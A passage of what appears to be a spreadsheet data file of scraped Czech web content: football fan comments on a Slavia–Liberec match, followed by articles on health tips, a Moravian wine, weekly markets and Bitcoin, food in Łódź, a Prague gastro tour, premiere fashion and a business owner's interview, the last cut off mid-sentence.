uživatelem upraven (01.12.2024 21:02) . Zobrazit původní komentář Původní komentář: Jednalo se o naprostou klukovinu, kterou nesmyslně zveličili, protože byli frustrovaní z neodvratné porážky. Reálně přišli o kolik? Dvě vteřiny? Kážou něco o fair play, přitom ten jejich Emene mohl v klídku pod sprchy za to oplácení. K tomu klukovi se slétli jak včelky, až mi to přišlo nedospělé, stačilo mu domluvit. Tahat to ještě na tiskovku je úplně dětinské a zakomplexované.. heftyje (přítel SN) před 7 dny 01.12.2024 21:45 | 6 0 Aneb muzes dostat hrace ze sparty, ale nedokazes dostat spartu z hrace… Re: Slavia - Liberec 1:0 buran před 8 dny 01.12.2024 18:09 | 19 0 Dobře zahráli Oscar i Zafi,ale já musím smeknout před Bořilem,v jeho věku a potom jeho zranění opravdu top,byl všude, vzadu to s přehledem ubránil a byl hodně nebezpečný před bránou soupeře. VÍTĚZSTVÍ POTĚŠILO Slávista 51 před 8 dny 01.12.2024 18:09 | 0 9 i když to bylo chvílemi téměř nekoukatelné, pro lepší náladu dáme něco ostřejšího na zahřátí, nebo grog, že. Re: Slavia - Liberec 1:0 Max1 před 8 dny 01.12.2024 18:45 | 32 1 četl jsem rozhovor s Kováčem....to je tak odporný člověk.....hrál jako prase, trénuje jako prase, ale má plnou držku fairplay Re: Slavia - Liberec 1:0 silikat před 8 dny 01.12.2024 19:03 | 11 0 Tak jsme to umlátili,zaplať pánbůh.Kéž by to aspoň takto vydrželo až do konce roku.Na Baníku to bude těžká šichta.Bohužel několika výraznými hráči se na jejich vzestupu podílíme i my.Naštěstí mají stejný problém špatnou koncovku.Příjemným zjevem byl Pech.A Oscar je duše dnešní Slavie . TAK V PLZNI JT TO Slávista 51 před 8 dny 01.12.2024 19:25 | 0 3 Re: TAK V PLZNI JT TO Slávista 51 před 8 dny 01.12.2024 19:26 | 0 3 Re: TAK V PLZNI JT TO Slávista 51 před 8 dny 01.12.2024 19:44 | 0 3 A když to tam tak vydrží, tak to bude na dalšího panáka, že! Re: TAK V PLZNI JT TO zeleznik2 před 8 dny 01.12.2024 20:00 | 2 0 Jo pěkný a teď záběry z Dukly , k nezaplacení. Komentář byl uživatelem upraven (01.12.2024 20:04) . Zobrazit původní komentář Původní komentář: Kortes před 8 dny 01.12.2024 19:45 | 15 0 Dnes důležité a ubojované 3 body. Další zápasy budou jak pravil Mojma na morál, ale věřím že je zvládneme. Mimochodem Kováč se ukázal jako odpornej vajgl... Re: Slavia - Liberec 1:0 zeleznik2 před 8 dny 01.12.2024 20:41 | 9 1 urs (přítel SN) před 8 dny 01.12.2024 20:44 | 13 0 Tak sympaťák to nikdy nebyl, navíc má temnou minulost z druhýho břehu. Prďet na něj, dojet zimu bez ztráty kytičky a užít si zimní přípravu jak nejlépe to jen jde. Dnes to bylo i dost o našem novém klenotu, Dominik hrál neskutečně. Re: Slavia - Liberec 1:0 mudrc před 8 dny 01.12.2024 19:49 | 1 30 Vzhledem k pajdajicim konkurentum je s jistotou o titulu rozhodnuto. Povede se i cesky pohar? Kazdopadne liga mistru je zpatky v Edenu . Seznace! Re: Slavia - Liberec 1:0 zeleznik2 před 8 dny 01.12.2024 20:04 | 19 0 Máme našlápnuto, ale ještě není hotovo, zbývají Baník , Olomouc a Teplice . </t>
  </si>
  <si>
    <t>5640</t>
  </si>
  <si>
    <t>12900</t>
  </si>
  <si>
    <t>20241201_9_3479453173_1c0561c8a7434e8055df.html</t>
  </si>
  <si>
    <t>1c0561c8a7434e8055df</t>
  </si>
  <si>
    <t>4 nejdůležitější věci, které všichni musíme udělat pro pevné zdraví</t>
  </si>
  <si>
    <t>Shrnutí 4 nejdůležitější věci, které všichni musíme udělat pro pevné zdraví Vyvážený jídelníček Zdravá a hlavně vyvážená strava je velmi důležitá pro vaše zdraví. I p řesto byste měli vědět, jak se objednat k l é kař i online. Ušetří te si t ím čas a preventivní prohlídky stále nesmíte podceňovat. Při sestavování jídelníčku a stravování myslete na to, že potřebujete hlavně hodně ovoce a zeleniny, vlákninu a zdrav é tuky. Zároveň byste měli omezit: alkohol , průmyslově zpracovan é potraviny. Pravidelný pohyb Fyzická aktivita je velmi důležitá bez ohledu na váš věk, pohlaví nebo zdravotní stav. Jestli nejste zvyklí vůbec cvičit, začněte každodenní proch ázkou po okolí. Postupně můžete aktivity i zátěž přidávat. Nakonec se dostanete na zdravou hmotnost, naberete svalovou hmotu a posílíte sv é zdraví. Pohyb na čerstv é m vzduchu vám navíc krásně vyčistí hlavu. Kvalitní spánek Pro dospěl é se doporučuje 7-9 hodin spánku každý den. Současný rychlý životní styl to mnoha lidem neumožňuje. Ze spánku byste si ovšem měli udělat prioritu a vytvořit si svou rutinu. Každý den choďte spát ve stejnou dobu a každ é ráno vstávejte ve stejnou dobu. To vyrovná cirkadiánní cyklus a zajistí, že všechny vnitřní procesy budou každou noc fungovat správně. Péč e o du ševní zdraví Nakonec nezapomínejte ani na svou mysl. Je to stejně důležit é jako fyzick é zdraví. Pomohou vám meditace, procházky v přírodě a případně tak é terapeut. Z áleží pouze na tom, v jak é m momentu sv é ho života se zrovna nacházíte. Když dáte vše dohromady, užijete si pevn é zdraví po mnoho dlouhých let. Další články ze sekce KRÁSA a ZDRAVÍ Datum: 28.11.2024 Autor: Autor: | redakce | Další články ze sekce | KRÁSA a ZDRAVÍ | Datum: 28.11.2024</t>
  </si>
  <si>
    <t>746</t>
  </si>
  <si>
    <t>20241201_90_3477248876_bbf9bdfd34bb037adea5.html</t>
  </si>
  <si>
    <t>bbf9bdfd34bb037adea5</t>
  </si>
  <si>
    <t>Víno Johanniter 2023, moravské zemské víno, Vinařství Vavrys</t>
  </si>
  <si>
    <t>Víno Johanniter 2023, moravské zemské víno , Vinařství Vavrys /100 5. 10. 2024 „Čistá, čirá, bledě žlutozelená barva se stříbřitými odlesky a dobrou viskozitou. Čistá, svěží, až pronikavá a omamná vůně, krásně snoubí čerstvě posečenou letní louku, s příjemnou kořenitostí zeleného pepře, sušené meruňky, zralých citrusů a medové plástve. Bohatá, středně plná, minerálně kořenitá, svěží, lehce nasládlá chuť, s velmi dobrou ovocnou kyselinkou, připomínající čerstvé i sušené bylinky, pomelo a kivi. Dlouhý ovocný závěr.“ /100 1. 11. 2024 „Čistá, širá, bledě žlutozelená barva s jemnými slámovými odlesky a výraznou viskozitou. Plná, čistá, intenzivní, mnohovrstevná, svěží, jemně kořenitá ovocná vůně, dokonale snoubí vanilkový lusk a zralé citrusy, s celým spektrem tropického ovoce, zejména banánu a ananasu. Plná, harmonická, šťavnatá, suchá, pocitově však lehce nasládlá chuť, s tóninou přezrálého exotického ovoce z buketu, jemně kořenitá, s lehkou minerální stopou a výraznější citrusovou kyselinkou. Dlouhý, elegantní závěr.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_91_3477276279_4369388cf79dce0a00b6.html</t>
  </si>
  <si>
    <t>4369388cf79dce0a00b6</t>
  </si>
  <si>
    <t>Vyplatí se nyní koupit Bitcoin? Americké akcie lámou rekordy! Je to past? | Burza s odstupem</t>
  </si>
  <si>
    <t>Vyplatí se nyní koupit Bitcoin? Americké akcie lámou rekordy! Je to past? | Burza s odstupem Koupit! Evropské akcie se opět vyvíjely smíšeně Panevropský index STOXX Europe 600 skončil v týdnu nepatrně výše, když překonal nejistotu ohledně amerických obchodních cel a výhledu úrokových sazeb. Hlavní akciové indexy v největších evropských ekonomikách se vyvíjely smíšeně. Italský FTSE MIB klesl o 0,24 %, zatímco francouzský index CAC 40 ztratil 1,29 %. Německý DAX si naopak připsal 0,84 % a drobně si polepšil i britský index FTSE 100. Zdroj: google.com/finance Tabulka ukazuje vývoj nejvýznamnějších evropských indexů v tomto týdnu a v roce 2024 Inflace v eurozóně se zvyšuje, ale základní tlaky se snižují Podle předběžného odhadu meziroční inflace v eurozóně v listopadu již druhý měsíc zrychlila na 2,3 % z říjnových 2,0 %. Růst se očekával, protože loňský pokles cen energií již není do meziročních sazeb zahrnut. Základní inflace však nečekaně oslabila. Ceny služeb se snížily ze 4,0 % na 3,9 %, zatímco jádrová inflace – která nezahrnuje volatilní ceny potravin, energií, alkoholu a tabáku – zůstala na úrovni 2,7 %. Finanční trhy stále očekávají, že Evropská centrální banka příští měsíc sníží výpůjční náklady, i když rozsah snížení zůstává nejistý. Zdroj: tradingeconomics.com Vývoj inflace v eurozóně za poslední 3 roky Německo v problémech: maloobchod padá, trh práce se zatím drží Smíšené ekonomické údaje ukázaly, že se německá ekonomika v posledním čtvrtletí letošního roku nadále potýkala s problémy. Maloobchodní tržby se v říjnu po sezónním očištění postupně snížily o 1,5 %, což je mnohem horší výsledek, než předpokládali analytici, kteří odhadovali pokles o 0,5 %. Přesto trh práce v listopadu prokázal určitou odolnost. Počet nezaměstnaných se po sezónním očištění zvýšil o 7 000 na 2,86 milionu, což je mnohem méně, než předpokládal konsenzus – 20 000 osob. Míra nezaměstnanosti se udržela na stabilní úrovni 6,1 %. České akcie po téměř 2 měsících oslabily Pražská burza po 7 týdnech nepřetržitého růstu oslabila, když index PX odepsal 0,81 % a dosáhl úrovně 1 684 bodů. Dařilo se akciím ČEZ , které navázaly na 5% růst z předchozího týdne a tentokrát posílily o 1 %. V kladných číslech se pak obchodovaly ještě akcie Philip Morris . Nadále pak oslabovaly akcie Erste Group , které si přesto letos připisují více než 40% zisk, a mírnou ztrátu zaznamenaly i akcie Komerční banky . Za poraženého týdne tak můžeme označit akcie Moneta, které odepsaly 3,59 %. Tato ztráta je však převážně technického charakteru, neboť se v týdnu začaly obchodovat bez nároku na výplatu dividendy. Zdroj: finex.cz Vývoj ceny nejvýznamnějších titulů obchodovaných na pražské burze v tomto týdnu a v roce 2024 Bitcoin konsoliduje v blízkosti rekordního maxima Vlajková kryptoměna čelila v průběhu týdne určitým tržním turbulencím v blízkosti svého ATH a v neděli kolem půl 11. spočívá na úrovni 97 tisíc dolarů. Bitcoin tak za posledních 7 dní ztratil přibližně 1 %. Ve ztrátě se obchodovaly i Solana a BNB. Drobný zisk si připsalo Cardano a mezi největšími kryptoměnami nejvíce zazářilo Ethereum s týdenním ziskem téměř 9 %. Ethereum doposud zaostávalo – změní se to? Druhá největší kryptoměna konečně vykazuje známky života poté, co strávila většinu roku 2024 ve stínu Bitcoinu. Zatímco Bitcoin láme rekordy a flirtuje se 100 tisíci dolary, Ethereum zůstává hluboko pod svým vrcholem z roku 2021, který činí 4 900 dolarů. Ve středu se však Ethereum vyšplhalo na nejvyšší úroveň od července – překonalo 3 500 tisíce dolarů, protože institucionální investoři nalili čerstvý kapitál do ethereových ETF. Meziroční nárůst Etherea o 76 % bledne ve srovnání s nárůstem Bitcoinu o 151 % a Solany o 287 %, což poukazuje na jeho relativní slabší výkonnost za posledních 12 měsíců. Ethereum však znovu získalo dynamiku, protože rally Bitcoinu ochladla a altcoinoví spekulanti doufají, že se jim podaří zopakovat horečný býčí trh z roku 2021. Objem obchodů s altcoiny se tak zintenzivnil, ale více než 60 % z nich je soustředěno do pouhých pěti tokenů. Jejich oživení by samozřejmě mohlo být zahnáno do kouta v lednu, kdy republikáni převezmou kontrolu nad americkou vládou, což by mohlo vdechnout Bitcoinu nový život, protože se stane oblíbenou alternativou této strany. Zdroj: coinmarketcap.com Vývoj ceny nejvýznamnějších kryptoměn za posledních 7 dní a posledních 12 měsíců Ceny ropy i zlata výrazně klesaly Cena ropy tentokrát výrazně klesla. Americká ropa WTI zakončila týdenní obchodování lehce nad cenou 68 dolarů za barel a za celý týden její cena oslabila o více než 4 %. Zlevnil i globální ropný benchmark – ropa Brent – který se ke konci pátečního obchodování usadil nad cenou 72 dolarů za barel a za týden odepsal 3,59 % hodnoty. Zdroj: finex.cz Vývoj ceny nejvýznamnějších komodit v tomto týdnu Cena zlata se pak opět propadla pod úroveň 2 700 dolarů, když tento drahý kov během týdne ztratil přes 2 % hodnoty a zakončil týdenní obchodování na hodnotě 2 650 dolarů za unci. Nejaktivněji obchodovaný únorový futures kontrakt zlata se pak momentálně obchoduje o 24 dolarů výše. Počtvrté během posledních 5 týdnů klesla cena stříbra a tentokrát srovnatelně jako cena zlata. Fyzické stříbro tak zakončilo týdenní obchodování na ceně 30,61 dolaru. Nejaktivněji obchodovaný březnový futures kontrakt stříbra se pak obchoduje hned o 49 centů výše. Co mě tento týden zaujalo: Ambiciózní plán Intelu na oživení americké výroby čipů právě získal podporu od Bidenovy administrativy. Polovodičový gigant získal největší přímou dotaci v rámci zákona CHIPS, a to grant ve výši 7,9 miliardy dolarů, který je součástí snahy americké vlády o posílení domácí výroby polovodičů. Proto jako číslo týdne volíme 7,9. Ačkoli je tato finanční podpora menší než původně navrhovaná částka 8,5 miliardy dolarů, představuje pro Intel zásadní záchranné lano v boji o znovuzískání konkurenční výhody. Financování pomůže společnosti v expanzi ve čtyřech státech USA , což může vést k vytvoření až 30 tisíc pracovních míst. Součástí dohody je, že se Intel musí po dobu pěti let zdržet zpětného odkupu akcií a po splnění určitých milníků obdrží v letošním roce nejméně 1 miliardu dolarů. Co nás čeká následující týden: Následující týden bude na trzích poměrně klidný. Z makroekonomických zpráv nás žádná “bomba” nečeká a z hospodářských výsledků stojí za zmínku dvě společnosti. Kyberbezpečnostní společnost Okta oznámí své hospodářské výsledky za třetí čtvrtletí v úterý 3. prosince po uzavření amerických trhů. Analytici očekávají zisk na akcii ve výši 0,57 dolaru, což představuje 29,55% nárůst oproti stejnému čtvrtletí minulého roku. V předchozím čtvrtletí Okta vykázala zisk na akcii ve výši 0,21 dolaru, čímž překonala očekávání o 0,29 dolaru, a její tržby dosáhly 646 milionů dolarů. Ulta Beauty pak zveřejní své finanční výsledky za třetí čtvrtletí ve čtvrtek 5. prosince po uzavření trhu. Ulta Beauty v předchozím čtvrtletí vykázala zisk na akcii ve výši 5,30 dolaru, čímž zaostala za očekáváním analytiků ve výši 5,47 dolaru. Společnost se dostala do povědomí díky tomu, že její akcie zařadil do portfolia ve 2. čtvrtletí samotný Warren Buffett . Ve 3. čtvrtletí ovšem 95 % akcií obratem prodal. Ukáže se jeho tah jako prozíravý? Nedávno jsme otevřeli náš Finex.cz Discord server, kde budeme tvořit místo pro diskuzi v rámci členů naší komunity, budeme do ní sami my i naši redaktoři přispívat. Přidejte se do naší komunity a přijďte diskutovat o naší akciové investici. Chladná hlava je základ. Nenechte se ovlivnit emocemi a krátkodobými propady. Držet se svého plánu. Děkujeme za přečtení! Přejeme hezký zbytek dne. Líbil se vám tento článek? 6 Ing. Patrik Kudláček Publicista a aktivní investor s více než desetiletou praxí preferující strategii hodnotového investování. O investování a finanční trhy se začal zajímat v roce 2013, kdy si prošel náročnou zkušeností jako aktivní denní obchodník. Tato negativní zkušenost vedla k hlubšímu studiu, které mu v následujících letech umožnilo dlouhodobě a úspěšně investovat. Ve své strategii kombinuje pasivní a aktivní přístup s důrazem na akciové trhy. Inspiraci čerpá z metod Warrena Buffetta a Benjamina Grahama , stejně jako od českého investora Daniela Gladiše. Svým čtenářům předává nabyté vědomosti prostřednictvím článků zaměřených na investiční strategie, psychologii obchodování a analýzy jednotlivých akcií „Největším nepřítelem investora jsou jeho vlastní emoce.“ – Benjamin Graham Autor: Patrik Kudláček Autor person Patrik Kudláček</t>
  </si>
  <si>
    <t>8710</t>
  </si>
  <si>
    <t>20241201_92_3477257731_002b132df8774efd2843.html</t>
  </si>
  <si>
    <t>002b132df8774efd2843</t>
  </si>
  <si>
    <t>Polská Lodž očima českého mlsouna</t>
  </si>
  <si>
    <t>Polská Lodž očima českého mlsouna Zkusili jste už židovskou kuchyni? Zveme vás (nejen) na oběd v Lodži Pączki, kugl, maczanka a steampunková káva – jeden den jedlíka v Lodži 1. 12. 2024 3 min. čtení diskuze ( 0 ) Milujete jídlo a rádi poznáváte nová místa přes lokální mňamky? Vydejte se s námi na mini gastro tour po polské Lodži . Články na téma objevujeme Lodž : Polská Lodž : Zastávka na cestě k Baltu , která vás uchvátí Víkend v polské Lodži : Kde se ubytovat? Nekonečná zábava v Manufaktuře: Proč si naplánovat víkend v polské Lodži Zažijte pulsující atmosféru nejdelšího polského bulváru v Lodži Zkusili jste už židovskou kuchyni? Zveme vás (nejen) na oběd v Lodži - právě čtete Přes pět metrů na délku a půl tuny váhy: Už jste viděli Krakena v Lodži ? Jste filmoví fanoušci? Pak musíte určitě navštívit toto město! Sladká svačinka v Manufaktuře pro příjemný start dne A začneme, řekněme, svačinkou v Manufaktuře, která je cílem většiny turistů. Chvíli po vstupu do areálu Manufaktury narazíte na prosklený tmavě šedý domeček s nápisem „ Pączkarnia “. Je víc než pravděpodobné, že se vám od jeho výlohy nebude chtít odejít, a pokud ještě navíc ucítíte vůni vanoucí z otevřeného prodejního okýnka, už jste lapení a s prázdnou neodejdete. A cože tu vlastně prodávají? Polské koblihy neboli „ pączki “. Oproti českým koblihám jsou asi o třetinu větší, a vedle pocukrování bývají také zdobené nejrůznějšími polevami a sypáním. Co je činí naprosto neodolatelnými, je velký výběr náplní. Kromě tradičních marmelád můžete ochutnat i některé netradiční – jako třeba džem z růží. V nabídce najdete i náplň mangovou s maracujou, kávovou, pistáciovou nebo višňovou. Cena se pohybuje od 7,5 do 10 polských zlotých (43–58 Kč). Ale musím vás upozornit – vzhledem k jejich gramáži jde o kalorickou bombu, která vás na delší čas zasytí, takže oběd doporučuji naplánovat s odstupem. Oběd: polská a židovská kuchyně v centru ulice Piotrkowska A když už je řeč o obědě, což takhle navštívit židovskou restauraci? Přece jen, Polsko je neodmyslitelně spjaté s židovstvím, a tak pro nás Čechy není od věci ochutnat i trochu netradiční kuchyni. Co obnáší, můžete zjistit například v restauraci Imber, která se nachází v jednom z dvorků v ulici Piotrkowska 43. I samotný dům, ve kterém se nachází, má židovskou historii – patřil totiž v minulosti židovskému továrníkovi Oskaru Konovi. Restaurace Imber svoje menu založila na propojení tradiční polské a židovské kuchyně. V nabídce tak najdete kupříkladu neuvěřitelně lahodný židovský tatarák ze sledě, skopové maso na několik způsobů včetně vývaru, challaburger, játra, hovězí szakszuku, zapečený lilek, ale třeba i tradiční polskou polévku zalewajku (chutná trošku jako kombinace bramboračky a kysela, protože má kváskový základ) nebo sernik (tvarohový koláč) či kugl (židovský nákyp). Používají tu nápadité kombinace surovin a spoustu čerstvých bylinek. Také čtěte Jinak samotná ulice Piotrkowska nabízí obrovské množství restaurací a bister všech cenových relací, takže si tu určitě vyberete, ať už je váš rozpočet jakýkoliv. Také čtěte 4. 12. 2024 Kateřina Tonarová Tipy a rady Kávička s fantazií Až vám trochu vytráví po báječném obědě, dopřejte si krátkou procházku a přesuňte se na šálek kávy nebo čaje do magické kavárny zvané Surindustrialle na adrese Legionow 2. Uvnitř kromě kavárny najdete obchod s kávou, čajem a ručně vyráběnými šperky a také spoustu stolních her. Nachází se ve dvorku se vzrostlým ořešákem a místo vás okouzlí neopakovatelnou atmosférou s fantaskními kovovými dekoracemi, které vám možná připomenou filmy o Harrym Potterovi nebo sci-fi ve stylu steampunku, jako Wild Wild West. Pokud máte rádi umělecké kreace, kdy se fantazii meze nekladou, tohle místo vás zaručeně nadchne. Mohlo by vás zajímat: Ubytování v polské Lodži : Kde přespat během víkendového pobytu Večeře v hipsterské Monopolis – Przy Kominie Den se hodí zakončit v nějakém krásném interiéru a se sklenkou vína . Proto vás pozvu do Monopolis, revitalizovaného areálu původní továrny na vodku, a zdejší restaurace Przy Kominie. Krásný interiér, kombinující původní cihlové zdi s kovovými industriálními prvky, velká okna a moderní výzdoba vás navnadí na další gastro zážitek. Restaurace nabízí polskou kuchyni v moderním pojetí. Dát si tu můžete tradiční kachnu, ale i saláty nebo třeba v Polsku velmi oblíbenou maczanku – v podstatě jde o jakýsi hamburger s trhaným masem. V každém polském městě ho připravují trochu jinak, zde konkrétně ochutnáte maczanku po lodžsku. A ochutnat můžete i lahodné polské víno . Samozřejmě si zde můžete i tematicky objednat polskou vodku. Pokud byste se o ní chtěli dozvědět víc, doporučuji se před večeří zastavit o patro níž ve volně přístupném mini muzeu, věnovanému bývalé továrně Monopoly a výrobě lodžské vodky. Zdroj info: Autorský text. Zdroj médií: Ladi Tichá, Anna Pocnarová. Autor: Ladi Tichá Autor person Ladi Tichá Rubrika transition_slide Tipy a rady</t>
  </si>
  <si>
    <t>34240</t>
  </si>
  <si>
    <t>20241201_93_3477245352_fab79881a978aa8a6f7a.html</t>
  </si>
  <si>
    <t>fab79881a978aa8a6f7a</t>
  </si>
  <si>
    <t>Péct chleba v&amp;nbsp;Esce nebo&amp;nbsp;dělat kremrole u&amp;nbsp;Myšáka. Ambi tour je unikátní zážitek</t>
  </si>
  <si>
    <t>Péct chleba v&amp;nbsp; Esce nebo&amp;nbsp;dělat kremrole u&amp;nbsp;Myšáka. Ambi tour je unikátní zážitek Navštívit šest podniků gastro skupiny Tomáše Karpíška v jednom odpoledni? Žádný problém. Vyražte s námi na tour, která vás provede po kuchyních a přípravnách nejvyhledávanějších podniků Prahy . „Během tour je dovolené úplně všechno,“ říká na začátku pražské gastro tour Filip Trčka, ombudsman hostů restaurací skupiny Ambiente. V osmičlenné skupině stojíme před karlínskou Eskou , do ruky dostáváme program. Přesněji řečeno seznam podniků, v nichž budeme v následujících hodinách všichni společně hodovat. Neznáme se, ale ten den usedneme hned několikrát k jednomu stolu. Všichni jsme se totiž přihlásili na akci Zakus Ambiente, gastro tour, která slibuje nahlédnutí pod pokličku těch nejlepších pražských podniků skupiny Tomáše Karpíška. Mezi námi jsou milovníci dobrého jídla, influenceři, ale i ti, kteří v oboru sami podnikají. „Jsem z Karlových Varů , kde mám hned několik gastro provozů. Ambiente sleduji, líbí se mi, jak to dělají, a tak bych se něco rád přiučil,“ říká mi hned v úvodu jeden z účastníků téhle několik hodin trvající procházky. I když procházky… Kroků během tour rozhodně neujdete tolik, abyste kompenzovali téměř nekonečný příjem kalorií. Těmi prvními probouzíme organismus v Esce . Ještě předtím, než dostaneme na ochutnávku místní chleba s máslem, si jeden zkoušíme upéct. Těsto je tu pro nás přichystané, my se do něj neobratnými pohyby snažíme vyrýt jednoduché symboly nebo písmena. O tom, že práce s hůlkou, na níž je upevněná oboustranná, mírně vypouklá žiletka, není jen tak, a tudíž si z našich nepovedených výtvorů připomínajících dětské kresbičky nemusíme nic dělat, nás ubezpečuje Jaroslav Kozdělka, šéfpecař karlínské Esky . Při prohlídce jeho pracovního stanoviště vedle umění bread scoringu nahlížíme i do dalších zajímavostí místního provozu. Tak například: chlebů – třiatřicítky a šestašedesátky (pojmenované jsou podle obsahu žitné mouky) – se tu denně vyrobí téměř šest set. Půlka se prodá přímo v karlínské pekárně, ta druhá se rozváží. „Kvalita chleba se odvíjí od kvasu. Kvas je srdce pekárny,“ připomíná Jaroslav Kozdělka s tím, že ten místní tu mají osm let. Krmí ho třikrát denně a díky starostlivé péči přežil covid, rekonstrukci i požár. Protože naše chleby v kamenné peci roztopené na 253 stupňů potřebují zhruba pětatřicet minut na upečení a zezlátnutí, odebíráme se ve skupině do druhého patra. Do prostor, kde otevřené kuchyni vládne šéfkuchař Martin Štangl. Na stole máme připravený košíček s bramborami v popelu, uzeným pstruhem, pažitkou, koprem a kefírem. Foto Honza Zima Tohle jídlo platilo v původní Esce za bestseller, ve Štanglu ho podávají ve formě amuse bouche. Následuje vepřové jelito s pyré z černých jablek a zeleninou na kyselo. „Snažíme se všechny suroviny zpracovat do posledního kousku,“ říká při degustaci místní šéf kuchyně. Jako příklad uvádí vlastní rybí omáčku, která tu tři měsíce fermentuje ve speciální, na šedesát stupňů vyhřáté fermentační lednici. Vyrábí se z vyfiletovaných zbytků ryb, vody, mořské soli a krup a podává se hned k několika pokrmům na menu, například k hovězímu masu. Specialitou je tu také hydroponické pěstování bylinek. „Nemyslíme si, že díky tomu zachráníme planetu, ale alespoň máme menší spotřebu vody,“ říká Martin Štangl. Na rozdíl od standardních degustačních večeří, které tu probíhají od úterý do soboty, netrvá naše návštěva tři hodiny. Na programu toho totiž máme ještě mnoho. K další zastávce naší gastro tour stačí ujít jen pár bloků: míříme do nedalekého pivovaru Dva kohouti. Už na dvorku nás vítá sládek Lukáš Tomsa a manažerka podniku Ivana Kubíčková . Ti nás během následující hodiny provedou procesem vaření a čepování místního piva . „Věděli jste, že barvy v logu mají svůj význam?“ zkouší nás hned zkraje přátelské duo. Když unisono kroutíme hlavou, význam červené a modré barvy hned osvětlují: červená symbolizuje vaření piva , modrá pak jeho ideální, nízkou výčepní teplotu. Foto Honza Zima Druhou zastávkou gastro tour Zakus Ambiente byla restaurace Štangl, kde vládne šéfkuchař Martin Štangl. Z dvorku se přesouváme dovnitř, kde se i přes skromnost prostoru odehrávají všechna pivní kouzla. Hned jak do Karlína dorazí slad, rozdrtí se tu ve šrotovníku, následně putuje do varny, kde se smíchá s vodou. Po procesu scezování se vzniklá kapalina – sladina – vaří s chmelem. Pak už přichází na řadu chlazení a kvasnice. „Ty mění cukry na alkohol ,“ vysvětluje Ivana Kubíčková u jednoho z tanků, „ pivo pak následně leží, a to od tří týdnů po tři měsíce,“ dodává, když naši skupinu vede k výčepu. Tady se učíme, jak pivo správně načepovat. „Důležité je, abyste měli čisté sklo, když půllitr není umytý, ulpívají bublinky pěny na sklenici a pěna brzy spadne,“ vysvětluje. Tour začínáme cítit nejen v žaludku, ale po několika ochutnávkách piva i v hlavě. Čas posunout se dál. Tramvají přejíždíme do Kantýny na Novém Městě , která patří po Brasileiru ve Slovanském domě , Lokále v Dlouhé ulici a podniku Pizza Nuova na náměstí Republiky mezi ty nejnavštěvovanější restaurace skupiny. Sem, do budovy bývalé banky, se chodí primárně za carpacciem s parmazánovou emulzí a petrželovým olejem, vyzrálým tatarákem, ale i burgery. Mimochodem, suchou cestou stařeného tataráku, jak nám u jídla osvětluje šéfřezník Jan Macík, tu jen během jednoho víkendového dne jsou schopni prodat na třicet kilo. Masa tu pak za víkend padne víc než tuna a půl. „Steaky děláme na dřevěném uhlí. Vepřové trhané z plece, hovězí trhané z kližky. Olej nepoužíváme v podstatě vůbec, vše děláme na sádle,“ vysvětluje Jan Macík, když nás provází po prostorné kuchyni a chladicích prostorách, kde se maso – všechno odebírané od Amasa – uskladňuje. Foto Honza Zima Naše plné žaludky volají po alespoň krátké procházce. Z Kantýny přecházíme do pár set metrů vzdáleného Myšáka. „Roky v Ambiente jíme, tak jsme chtěly vidět, jak to všechno vzniká,“ říkají mi během cesty dvě účastnice tour. „Chodíme i na kurzy konkurence, všechno, co se týká jídla, nás zkrátka zajímá,“ dodávají. V horním patře cukrárny Myšák už na nás čekají prostřené stoly. Ochutnáváme čokoládové pralinky a o pár chvil později si s asistencí Lukáše Pohla zkoušíme čerstvě vyšlehaným bílkem naplnit upečené kremrole, které si z předposlední zastávky odnášíme jako malý suvenýr. Ten den nebude jediný – na poslední zastávce, v centru vzdělávání a inovací UM na Národní, dostáváme onen ručně naříznutý chleba ze začátku našeho dne. Společně se pak loučíme ještě skleničkou Espresso martini. Tour je u konce, nám nezbývá nic jiného než se odvalit domů vyležet vzniklé food coma. Stálo to ale za to. Zážitek, který vás dostane do kuchyně několika pražských podniků, si navíc můžete připomínat ještě několik dní poté. Třeba třiatřicítkou, kterou jste si upekli v Esce . Autor: Petra Šimůnková Autor Petra Cieslar</t>
  </si>
  <si>
    <t>20241201_94_3477275506_57494de2b113e9ef622c.html</t>
  </si>
  <si>
    <t>57494de2b113e9ef622c</t>
  </si>
  <si>
    <t>Módní policie z premiér: Kerekes v thrillerové černé, džíny ale dělají varhánky na stehnech. Plodková v karamelu</t>
  </si>
  <si>
    <t>Módní policie z premiér: Kerekes v thrillerové černé, džíny ale dělají varhánky na stehnech. Plodková v karamelu Mariam Khundadze Gruzínská herečka Mariam Khundadze přišla s outfitem, který říká: ‚Léto je ve vzduchu, nebo alespoň v mé skříni.‘ Batikovaný top bez ramínek a sukně posazená hodně nízko, s korálkovým lemem – vypadá jako stylová výzva pro letní festival. A k tomu kovbojské kozačky, které jako by chtěly zažít divoký západ… ale Mariam se nachází na jiném kontinentu. Vzhledem k ročnímu období by delší vršek s rukávy a pár výrazných doplňků udělaly divy. Ale ať už léto nebo zima, Mariam ví, jak zaujmout – i když někdy možná až příliš. Mariam Khundadze Autor: Václav Kutýr Autor person Václav Kutýr</t>
  </si>
  <si>
    <t>20241201_95_3478174705_5ac1a899a978afb00029.html</t>
  </si>
  <si>
    <t>5ac1a899a978afb00029</t>
  </si>
  <si>
    <t>Svoji ženu vnímá jako parťáka. Bez její podpory by novou firmu nezaložil</t>
  </si>
  <si>
    <t>Svoji ženu vnímá jako parťáka. Bez její podpory by novou firmu nezaložil Loni na jaře nabral Zdeněk Mikuláš nový dech, když se odhodlal opustit zavedenou firmu a začít podnikat pod novou značkou. Dneska je rád, změna mu dává novou energii. Ačkoli pochází ze Zlínska , radši než slivovici má bílé víno . Je ze tří bratrů, doma je ale v menšině proti čtyřem ženám. Adventní období jasně určilo, čím náš rozhovor začal… Máte rád Vánoce? Mám rád Vánoce, protože je klid. A jsem s rodinou. I když je to občas těžší, protože je to vlastně šok. většinou se snažím přes Vánoce nepracovat. Mám je rád, protože nezvoní telefony a můžeme se věnovat věcem, kterým bychom se měli věnovat pravidelně a průběžně celý rok, ale protože žijeme hekticky, tak se jim věnujeme aspoň o těch Vánocích. Jak vypadá váš Štědrý den? Už několik let býváme doma. I když jsem už mockrát říkal, ale zatím se mi to nepodařilo prolobbovat, že bych chtěl být na horách, kde je sníh, nebo klidně u moře. Ale býváme doma, v Říčanech u Prahy . Dopoledne chodíme na prvorepublikovou plovárnu na rybí polévku, na čaj, na svařák, mívají tam šampaňské a ústřice. Nechci říct, že se tam sejde polovina města, ale potkáme tam hodně lidí. Je to pěkná procházka, těšíme se na Ježíška, i když už na něho nikdo nevěří… Nejmladší, jedenáctiletá dcera 